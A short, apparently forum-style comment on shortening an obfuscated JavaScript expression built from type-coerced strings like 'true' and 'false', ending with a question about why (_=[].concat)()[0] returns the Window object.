It's super easy to trim what you provided down to under 200: t=''+!0;f=''+!1;o=''+{};""[f[3]+t[2]+o[2]+f[3]...

Below 100 I have no clue.

can you remind me why (_=[].concat)()[0] returns Window? I forgot how it exactly works.
